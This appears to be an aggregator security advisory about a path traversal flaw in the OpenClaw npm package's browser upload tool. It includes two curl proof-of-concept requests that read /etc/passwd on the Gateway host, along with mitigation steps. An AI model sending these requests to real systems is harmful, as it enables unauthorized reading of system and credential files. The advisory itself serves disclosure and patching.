Listen to this Post
The vulnerability allows an authenticated attacker to read arbitrary files from the Gateway host by manipulating the browser tool’s upload functionality. The server passes user-supplied paths directly to Playwright’s `setInputFiles()` APIs without validating or restricting them to a safe root directory . Attackers can supply absolute paths or path traversal sequences (e.g., ../../etc/passwd) to the vulnerable endpoints. The primary entry points are `POST /tools/invoke` with `{“tool”:”browser”,”action”:”upload”,…}` and `POST /hooks/file-chooser` . When these unvalidated paths reach Playwright, the framework reads the referenced files from the local filesystem and attaches them to a page-level `` element. The file contents can then be exfiltrated through page JavaScript using `FileReader` API or via agent/browser snapshots . Exploitation requires the attacker to reach the Gateway HTTP surface, present valid authentication (bearer token or password), and have the browser tool permitted by policy . In default configurations, the Gateway binds to loopback with a generated token, but exposure increases if operators bind to LAN, use reverse proxies, or tunnels . The vulnerability affects OpenClaw npm package versions before 2026.2.14, including the latest published version 2026.2.13 .
Platform: OpenClaw (npm)
Version: < 2026.2.14
Vulnerability: Path Traversal
Severity: High
date: 2026-02-18
Prediction: 2026-02-25
What Undercode Say:
Analytics:
- Multiple OpenClaw vulnerabilities fixed in version 2026.2.14 including SSRF in Tlon extension (GHSA-pg2v-8xwh-qhcc) and unsafe hook module handling (GHSA-v6c6-vqqg-w888)
- Vulnerability reported by @p80n-sec with clear reproduction and impact analysis
- Fix commit: `3aa94afcfd12104c683c9cad81faf434d0dadf87`
– Patch confines upload paths to `DEFAULT_UPLOAD_DIR` and rejects traversal attempts
Exploit:
Exploit using curl to read /etc/passwd
curl -X POST http://target:port/tools/invoke \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
-d '{"tool":"browser","action":"upload","params":{"paths":["/etc/passwd"]}}'
Alternative using path traversal
curl -X POST http://target:port/tools/invoke \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
-d '{"tool":"browser","action":"upload","params":{"paths":["../../../../etc/passwd"]}}'
Protection from this CVE:
Upgrade to patched version npm install [email protected] Verify installation npm list openclaw If unable to upgrade, restrict network exposure Bind to loopback only in config echo '{"gateway":{"bindAddress":"127.0.0.1"}}' > config.json Audit current version npm audit | grep openclaw
Impact:
- Arbitrary local file read on Gateway host
- Confidentiality breach: access to system files, configuration, credentials
- Increased risk when Gateway exposed beyond loopback
- No code execution, but file disclosure can enable further attacks
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

